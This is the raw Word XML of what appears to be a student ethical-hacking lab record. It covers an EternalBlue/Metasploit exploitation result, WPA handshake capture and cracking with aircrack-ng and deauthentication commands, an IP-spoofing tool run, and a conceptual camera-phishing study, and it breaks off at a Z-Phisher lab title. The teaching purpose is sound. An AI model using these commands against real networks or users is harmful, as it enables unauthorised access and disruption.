    <w:p w14:paraId="557CD31F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="30BC31B7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3ECC1112" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="35B7C657" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6640D989" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="60E6461E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7D1CD592" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="563A38B9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="336B4F7B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESULT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">:  Thus, The Windows system was successfully exploited using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010) vulnerability through the Metasploit Framework. A Meterpreter session was established, providing remote access and control over the target machine.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5025F0" w14:paraId="6887C01D" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="32592BCE" w14:textId="7403711A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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="21F253DB" w14:textId="471BE434" w:rsidR="005025F0" w:rsidRPr="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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5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WIRELESS AUDIT ON ROUTERS AND DECRYPT THE WPA KEYS USING AIRCRACK-NG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005025F0" w14:paraId="5B50D7EF" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE20448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0BCB1FA4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A89961F" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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4705F31" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025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E59CEA5" w14:textId="2054132D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perform wireless network analysis and security auditing using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tools in Kali Linux for educational and ethical hacking purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66596D4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0FC3094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SOFTWARE REQUIREMENTS : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4846B3C4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5B6B4609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3D6AAD53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40880BC4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Security Tools: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Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E382409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0ACB523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SYSTEM REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D3BB4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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8845AD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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5DD28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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062232C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="20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Wireless Adapter supporting Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC081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4CFED0D7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69E9F6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6E55D6FB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Launch Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E254D99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the Kali Linux virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281ECE82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 in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E528AB" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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</w:p>
    <w:p w14:paraId="325600F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Connect Wireless Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870ADB9" w14:textId="77777777" w:rsidR="00F44251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Attach a wireless adapter that supports monitor mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C55473" w14:textId="77777777" w:rsidR="00F44251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Verify adapter using:   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E4562C4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251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46EAF2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3: Enable Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F081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497170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35A4C5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AFDE6D1" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025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A30852B" w14:textId="140E7DD4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4: Scan Wireless Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271A659" w14:textId="77777777" w:rsidR="00F44251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Scan nearby networks:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D079B78" w14:textId="77777777" w:rsidR="00F44251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the BSSID and channel of the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E41D16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53CD4AC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5: Capture Packets : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B791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Capture packets from target network:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;BSSID&gt; -c &lt;CHANNEL&gt; -w capture wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EF5E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Step 6: Perform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Deauthentication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Attack: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0C444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Generate traffic to capture handshake: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 -a &lt;BSSID&gt; wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A556A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7: Crack Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB0BBB" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:p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 wordlist to crack the captured handshake:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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 xml:space="preserve">-ng </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>capture.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDD975" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C0CC9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000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Nearby wireless networks displayed with BSSID and signal strength.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD34619" w14:textId="77777777" w:rsidR="00F44251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Packets captured successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77350711" w14:textId="77777777" w:rsidR="00F44251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 cracking attempted using wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D1D26" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000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found for weak passwords (if successful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37340BF4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62BB5E9D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4929981C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5BBD334D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0465F59B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568BEC9C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="280" w:line="360" w:lineRule="auto"/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Wireless networks were successfully analyzed and audited using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tools. The experiment demonstrated how weak passwords and insecure configurations can be exploited, highlighting the importance of strong encryption and secure Wi-Fi practices.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58C957D1" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6F35E0BE" w14:textId="1E50E391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9" w:name="_mven1lw82j81" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="4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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="00FBD93B" w14:textId="327889C2" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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IP SPOOFING USING A GITHUB TOOL (EDUCATIONAL DEMONSTRATION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="082CC858" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3ACD49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DE23F16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B9B1976" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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1A33FE3" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault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4026B3D" w14:textId="7E5C9A95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>To demonstrate IP spoofing techniques using an open-source GitHub tool in Kali Linux for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8C89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understanding network-level attack concepts and security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06953DD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26728F9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0" w:name="_osej9yqpdfuf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5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SOFTWARE REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC5573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5266E755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50C57774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4284733C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Tool: John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E459352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Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E319869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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0FC70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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D13E1C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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48A7D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075AC922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40E2C66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6E298A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4E07888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Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D638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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1277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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544A546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585577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Open Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779D6A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Launch Terminal in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282BF39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Update system packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392CF9E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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B7A58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551145A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3: Clone IP Spoofing Tool from GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A90C2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Clone the repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4405C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git clone https://github.com/&amp;lt;username&amp;gt;/&amp;lt;ip-spoofing-tool&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E02A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Navigate to the tool directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7867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cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-spoofing-tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E9B5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4: Install Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA01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Install required dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411A52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apt install python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9757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pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BA41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37365C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5: Configure the Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14E96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the script file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AC0E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nano spoof.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD819E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Configure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096618D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Target IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3E83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Spoofed source IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880665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Network interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2E1B5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2AF9CF3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Execute IP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C906C5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Run the tool with root privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99383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python3 spoof.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F9F4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Observe packet transmission with spoofed IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E5132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475D9BF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7: Monitor Network Traffic (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D344FE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Use Wireshark or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AEA4B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</w:p>
    <w:p w14:paraId="59622D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Verify spoofed source IP packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B652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6E54417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47210E8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6FF5300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C1FDBC0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Packets are sent with forged source IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E29CB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Network traffic reflects spoofed IP information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D630CE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Demonstration successfully completed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B236F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42B0F92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301415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23540C9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0033B1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6FF5DB6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DBB065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3AEE9DF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F2F7B86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SCREEN SHOTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2BF9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D9DAE4B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9ECCE78" wp14:editId="3CB9B85C">
            <wp:extent cx="5943600" cy="2628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45F4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89763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BE26CA7" wp14:editId="786F043A">
            <wp:extent cx="5943600" cy="3271838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4945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AE215" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1A1026BC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="560222CD" wp14:editId="2AFDE485">
            <wp:extent cx="5943600" cy="26797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AAB5F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="467D5ABD" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="520EEEFC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="21F309B9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="03C8BF53" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="476080B5" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5C368A60" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="336770EC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="2263E4BA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6D4A88FC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5F762E72" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="53E0B1D7" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6E136A8E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="79EBC78A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6552E002" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="376895B4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4243E039" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="40FDCFA3" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="64136D6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58729D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1D058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129B9C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868C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0810C8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578798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9DA5A8D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>Thus, the IP spoofing was successfully demonstrated using a GitHub-based tool in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0A365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experiment illustrates how attackers can manipulate IP headers and highlights the need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5E28A" w14:textId="55499B10" w:rsidR="00F44251" w:rsidRPr="00C6689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robust network security mechanisms.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2D971AEA" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6295AE31" w14:textId="0616CE40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51" w:name="_7jwmiu9un7fu" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="5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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="23487401" w14:textId="5988946B" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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OF CAMERA PHISHING USING OPEN-SOURCE GITHUB TOOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="72E17765" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F0409A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3EB1342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C4EB778" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689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EAE40D2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3999FF4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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To study the concept of camera phishing attacks using an open-source GitHub tool in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A227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Linux in order to understand privacy threats and the importance of secure user awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F290C5E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24CC4386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4B472932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2" w:name="_51f8m8mr3a6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5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SOFTWARE REQUIREMENTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040441E1" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="325FF8A1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26D2128E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641E91CC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03CC3281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Tool: John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBA27D9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Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F979762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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597657E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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D52EA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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C02A110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BE9DCA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05C28D1F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3AC966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5F12095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Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC287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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA28D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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE7DE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35FE12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Study the Open-Source Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E5D4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Access an open-source GitHub repository related to camera phishing (educational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D562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purpose).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE8BE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Review the documentation to understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509FB2E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How fake permission prompts are created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5DA85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How user interaction is exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCECBF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Ethical limitations of such tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3195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01073D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2394A1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3: Understand the Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC0A4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Analyze how phishing pages request camera permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668423C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Observe how browsers handle camera access requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D9A9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Study how attackers misuse user trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000154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1B3F93D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4: Simulated Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116510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Perform a local, consent-based simulation using test accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00305A1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Observe how camera permission prompts appear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCA2E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Analyze user response behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03735B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B6D4BB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5: Analyze Security Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD92C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Identify risks related to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4AF1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Unauthorized camera access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDD44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Privacy leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4A5B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Social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386511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Discuss how modern browsers and OS security attempt to mitigate such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1E9F9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FD9D0A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Study Prevention Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222625F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Browser permission management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8ADD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awareness and training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66634BBB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 and trusted domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D446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OS-level camera access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371562AE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778973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E0CB41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26B95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60D59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AB71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CFE50C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2D8F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9B8E18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A7187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18C33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C88F9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F897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B90E8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6FB773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6DD7F28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40D34" w14:textId="77777777" w:rsidR="00F442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34982F" wp14:editId="21BF230F">
            <wp:extent cx="5857875" cy="2630649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r="64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630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B5E68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17F70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C2ECB7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CB0C413" wp14:editId="645EEDA2">
            <wp:extent cx="5629275" cy="277653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2564" t="2641" r="2724" b="1780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76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FFA3A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F636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063D11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61814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AA55C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AA1905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8ED19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0AB884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>The study of camera phishing using an open-source GitHub tool was successfully completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785557B2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Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72A61B" w14:textId="1F5B26FD" w:rsidR="00C6689C" w:rsidRDefault="00C6689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1CD33B7B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="397973E7" w14:textId="559AF0D1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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="036034B8" w14:textId="33ADCAA8" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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OF PHISHING ATTACKS USING Z-PHISHER (GITHUB TOOL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="2FE740E3" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
